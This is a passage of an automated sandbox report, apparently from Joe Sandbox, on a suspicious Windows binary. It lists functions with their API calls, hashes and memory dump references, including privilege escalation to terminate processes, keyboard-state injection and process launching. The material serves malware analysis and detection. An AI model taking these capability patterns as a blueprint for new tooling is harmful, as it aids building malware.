                                            • Opcode Fuzzy Hash: 4ff7861d06d7ab421269915a2de1f27044af90def7d6faa162b72154c4d0752c
                                            • Instruction Fuzzy Hash: 5D418071A14308AFDF219F64CC85BEE77E8EF08354F10156AF984F7292D6729D888B50
                                            Function 00E8EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E73E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E73EB6
                                              • Part of subcall function 00E73E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E73EC4
                                              • Part of subcall function 00E73E91: CloseHandle.KERNEL32(00000000), ref: 00E73F8E
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E8ECB8
                                            • GetLastError.KERNEL32 ref: 00E8ECCB
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E8ECFA
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E8ED77
                                            • GetLastError.KERNEL32(00000000), ref: 00E8ED82
                                            • CloseHandle.KERNEL32(00000000), ref: 00E8EDB7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                            • String ID: SeDebugPrivilege
                                            • API String ID: 2533919879-2896544425
                                            • Opcode ID: c67b4e9d2cca1f881a7e59209b64c692a06ce3ad8b842bde9ba9a18d7a114b20
                                            • Instruction ID: fc004d03bd5c974795dcc2bd8326615f42a011cb9e85958ba4b6decc26ad5c11
                                            • Opcode Fuzzy Hash: c67b4e9d2cca1f881a7e59209b64c692a06ce3ad8b842bde9ba9a18d7a114b20
                                            • Instruction Fuzzy Hash: 5641BE702402009FDB14EF24CC95FADB7E1AF80714F08901AF84AAB3C2DB75A808CB96
                                            Function 00E73226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadIconW.USER32(00000000,00007F03), ref: 00E732C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconLoad
                                            • String ID: blank$info$question$stop$warning
                                            • API String ID: 2457776203-404129466
                                            • Opcode ID: 9ab8e93c2ead82c92920f526983ff7858ddfe262af4d1095f3022bffbcbe770f
                                            • Instruction ID: d232c53e1885eb3c7480eaef2f89f7ed6f473c26e71eaf98f838403a3629400d
                                            • Opcode Fuzzy Hash: 9ab8e93c2ead82c92920f526983ff7858ddfe262af4d1095f3022bffbcbe770f
                                            • Instruction Fuzzy Hash: BD1187312493DABAA7005A70DC46DAAB7DCDF09338F20602BF908B6193E6B25B0057A5
                                            Function 00E74534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E7454E
                                            • LoadStringW.USER32(00000000), ref: 00E74555
                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E7456B
                                            • LoadStringW.USER32(00000000), ref: 00E74572
                                            • _wprintf.LIBCMT ref: 00E74598
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E745B6
                                            Strings
                                            • %s (%d) : ==> %s: %s %s, xrefs: 00E74593
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HandleLoadModuleString$Message_wprintf
                                            • String ID: %s (%d) : ==> %s: %s %s
                                            • API String ID: 3648134473-3128320259
                                            • Opcode ID: 6b95619a8f8fdaad5fee8c8a825af3cdc3bbe416d7d730dbe049caa87f8f99a8
                                            • Instruction ID: 7923e4edd283ca9fcf1f4fa08e614aedddf091bacf558dd4bedc5b0b52762d9e
                                            • Opcode Fuzzy Hash: 6b95619a8f8fdaad5fee8c8a825af3cdc3bbe416d7d730dbe049caa87f8f99a8
                                            • Instruction Fuzzy Hash: ED0144F2500308BFE71097A29D89EF6776CD708301F0005A7F749F2052E6749E858BB0
                                            Function 00E9D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • GetSystemMetrics.USER32(0000000F), ref: 00E9D78A
                                            • GetSystemMetrics.USER32(0000000F), ref: 00E9D7AA
                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E9D9E5
                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E9DA03
                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E9DA24
                                            • ShowWindow.USER32(00000003,00000000), ref: 00E9DA43
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E9DA68
                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E9DA8B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                            • String ID:
                                            • API String ID: 1211466189-0
                                            • Opcode ID: 39e21dc4127d221ff608f9c5a9bc5afb74ed43ef0aaae4bbb56aa97f47e71bc1
                                            • Instruction ID: c819869c3ce7ae7a3332dfa031e4f6a160937081335f6c7fab467a9a77269cb1
                                            • Opcode Fuzzy Hash: 39e21dc4127d221ff608f9c5a9bc5afb74ed43ef0aaae4bbb56aa97f47e71bc1
                                            • Instruction Fuzzy Hash: 49B1B935604225EFDF18CF69C9C57AD7BB1FF44704F08906AEC48AB295D770A960CBA0
                                            Function 00E12A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000), ref: 00E12ACF
                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000,000000FF), ref: 00E12B17
                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000), ref: 00E4C46A
                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E4C417,00000004,00000000,00000000,00000000), ref: 00E4C4D6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: ede84f9061fc6f8bccc90c530cae7d1fb0b06f1d28e38686505acce43047f1bc
                                            • Instruction ID: a6eb42ae8a18d5d9d5cf1115409705e3bbea00d0820497b60c94fbaa16878080
                                            • Opcode Fuzzy Hash: ede84f9061fc6f8bccc90c530cae7d1fb0b06f1d28e38686505acce43047f1bc
                                            • Instruction Fuzzy Hash: 1B413C312087809FC7398B299D98BFB3BA1AF45304F24A41FE257B7561D635A8E5D710
                                            Function 00E77368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E7737F
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E773B6
                                            • EnterCriticalSection.KERNEL32(?), ref: 00E773D2
                                            • _memmove.LIBCMT ref: 00E77420
                                            • _memmove.LIBCMT ref: 00E7743D
                                            • LeaveCriticalSection.KERNEL32(?), ref: 00E7744C
                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E77461
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E77480
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                            • String ID:
                                            • API String ID: 256516436-0
                                            • Opcode ID: d33f7d6daea0de4b644ef3ff45c1bbf20a936bf2092030a9016a41caa5578ff0
                                            • Instruction ID: 6c1a3efa941f6c410ff372bdaa6d34421762ddcfb74c04580b58f2da07764441
                                            • Opcode Fuzzy Hash: d33f7d6daea0de4b644ef3ff45c1bbf20a936bf2092030a9016a41caa5578ff0
                                            • Instruction Fuzzy Hash: 65315D31A04205EFDB10DF65DD89AAE7BB8EF44710F1481BAF904FB256DB709A14DBA0
                                            Function 00E96442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DeleteObject.GDI32(00000000), ref: 00E9645A
                                            • GetDC.USER32(00000000), ref: 00E96462
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E9646D
                                            • ReleaseDC.USER32(00000000,00000000), ref: 00E96479
                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E964B5
                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E964C6
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E99299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E96500
                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E96520
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                            • String ID:
                                            • API String ID: 3864802216-0
                                            • Opcode ID: 8ed87dd76d345d5dc8488d4b35915a95235ee71085b77bce415475829ca803fc
                                            • Instruction ID: 772d081dd25ce0bea7fa58a107adb4e9869affd0a012629d54870717e784ad3c
                                            • Opcode Fuzzy Hash: 8ed87dd76d345d5dc8488d4b35915a95235ee71085b77bce415475829ca803fc
                                            • Instruction Fuzzy Hash: 27318D72201210BFEF108F51CC8AFEA3FA9EF09765F040066FE08EA196C6759C51CBA0
                                            Function 00E6C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memcmp
                                            • String ID:
                                            • API String ID: 2931989736-0
                                            • Opcode ID: 6eff56a46b8e40846cea9a4d7eb84ad7b06d4b94be4a34d0a65f82a1bb4b8b6f
                                            • Instruction ID: 146057bbfdc67dfb45d7c488935c4233911d3f47e4a169105b8694d1bea93f2c
                                            • Opcode Fuzzy Hash: 6eff56a46b8e40846cea9a4d7eb84ad7b06d4b94be4a34d0a65f82a1bb4b8b6f
                                            • Instruction Fuzzy Hash: C221D771681305B7D250A525AC47FBB37ACAF163E8F243028FE46BA283E751ED11C1E5
                                            Function 00E7ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                            • _wcstok.LIBCMT ref: 00E7EEFF
                                            • _wcscpy.LIBCMT ref: 00E7EF8E
                                            • _memset.LIBCMT ref: 00E7EFC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                            • String ID: X
                                            • API String ID: 774024439-3081909835
                                            • Opcode ID: 9ac66b26f67fd2ca6495d95bc1fa54d5fd9f27f052ec1044180c11c7fd238a8e
                                            • Instruction ID: d8bad204ac1b8986808199bbc1f8e65a9851cdcee6b05769024392305fb1e539
                                            • Opcode Fuzzy Hash: 9ac66b26f67fd2ca6495d95bc1fa54d5fd9f27f052ec1044180c11c7fd238a8e
                                            • Instruction Fuzzy Hash: BBC151716083019FC724EF24C895A9EB7E4FF85314F04996DF899A72A2DB30ED45CB92
                                            Function 00E86E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E86F14
                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E86F35
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86F48
                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00E86FFE
                                            • inet_ntoa.WSOCK32(?), ref: 00E86FBB
                                              • Part of subcall function 00E6AE14: _strlen.LIBCMT ref: 00E6AE1E
                                              • Part of subcall function 00E6AE14: _memmove.LIBCMT ref: 00E6AE40
                                            • _strlen.LIBCMT ref: 00E87058
                                            • _memmove.LIBCMT ref: 00E870C1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                            • String ID:
                                            • API String ID: 3619996494-0
                                            • Opcode ID: 414f5f3f68fc3833e83a7df8ae394fa1fd905c87b2ab8416981ebd5d6aacba83
                                            • Instruction ID: de7ce70e0e4ee732bd639dbf8f6af642a098330fb109b85265c0027429afd7af
                                            • Opcode Fuzzy Hash: 414f5f3f68fc3833e83a7df8ae394fa1fd905c87b2ab8416981ebd5d6aacba83
                                            • Instruction Fuzzy Hash: AA81D171508300ABC710EF24CC95EABB7E9AF84718F14691DF59EBB2A2DA70DD44C792
                                            Function 00E11424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82d4c6313403a227ddd920620a49d294135c7d4b92114f51cf0016d240d9af95
                                            • Instruction ID: f0e2d0dd8fce141b64da2e56c00999ad1894ef450e811a0de9ef71ba99f2f430
                                            • Opcode Fuzzy Hash: 82d4c6313403a227ddd920620a49d294135c7d4b92114f51cf0016d240d9af95
                                            • Instruction Fuzzy Hash: B5716F30900119EFCB04CF99CC45AFEBBB9FF85314F148199FA25BA251C734AA91CBA4
                                            Function 00E9B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindow.USER32(01044E28), ref: 00E9B6A5
                                            • IsWindowEnabled.USER32(01044E28), ref: 00E9B6B1
                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E9B795
                                            • SendMessageW.USER32(01044E28,000000B0,?,?), ref: 00E9B7CC
                                            • IsDlgButtonChecked.USER32(?,?), ref: 00E9B809
                                            • GetWindowLongW.USER32(01044E28,000000EC), ref: 00E9B82B
                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E9B843
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                            • String ID:
                                            • API String ID: 4072528602-0
                                            • Opcode ID: 253907af5c63bd546f508e74d50e8a0644cd5e7134893c490310068c579c092f
                                            • Instruction ID: 8c72fe5c6d7834d7b9be6c1dc3e2a21e545060995903872b2365dbfb480e79d0
                                            • Opcode Fuzzy Hash: 253907af5c63bd546f508e74d50e8a0644cd5e7134893c490310068c579c092f
                                            • Instruction Fuzzy Hash: 8E719D34600204AFDF249FA5EAD4FEA7BB9EF89304F14126BE945B7362C731A951CB50
                                            Function 00E8F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E8F75C
                                            • _memset.LIBCMT ref: 00E8F825
                                            • ShellExecuteExW.SHELL32(?), ref: 00E8F86A
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                            • GetProcessId.KERNEL32(00000000), ref: 00E8F8E1
                                            • CloseHandle.KERNEL32(00000000), ref: 00E8F910
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                            • String ID: @
                                            • API String ID: 3522835683-2766056989
                                            • Opcode ID: d9f3e558f1d05974fefa5359a88f60819bede8a84c65464812aa9b141cbee5a5
                                            • Instruction ID: 216a7d306b2b062f08b7102f0268f0df7ae6006394b97a99f1a3ba30bd792802
                                            • Opcode Fuzzy Hash: d9f3e558f1d05974fefa5359a88f60819bede8a84c65464812aa9b141cbee5a5
                                            • Instruction Fuzzy Hash: C4619C75A006199FCB14EF64C5919AEBBF5FF48310F14946AE84ABB351CB30AD80CF90
                                            Function 00E7145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32(?), ref: 00E7149C
                                            • GetKeyboardState.USER32(?), ref: 00E714B1
                                            • SetKeyboardState.USER32(?), ref: 00E71512
                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E71540
                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E7155F
                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E715A5
                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E715C8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessagePost$KeyboardState$Parent
                                            • String ID:
                                            • API String ID: 87235514-0
                                            • Opcode ID: e16a8f8f744c3c349e8fe149a825a110fd76e2ec0012a6b46c282e6ad6a43998
                                            • Instruction ID: 53b918f72fad41c6aa932050df0dca104759d1d7fdc4239031b956c9b854c099
                                            • Opcode Fuzzy Hash: e16a8f8f744c3c349e8fe149a825a110fd76e2ec0012a6b46c282e6ad6a43998
                                            • Instruction Fuzzy Hash: B851D2A06047D53EFB3A46788C45BBA7EA95B46308F08D4C9E5D9698C2D398DC84D750
                                            Function 00E71276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32(00000000), ref: 00E712B5
                                            • GetKeyboardState.USER32(?), ref: 00E712CA
                                            • SetKeyboardState.USER32(?), ref: 00E7132B
                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E71357
                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E71374
                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E713B8
                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E713D9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
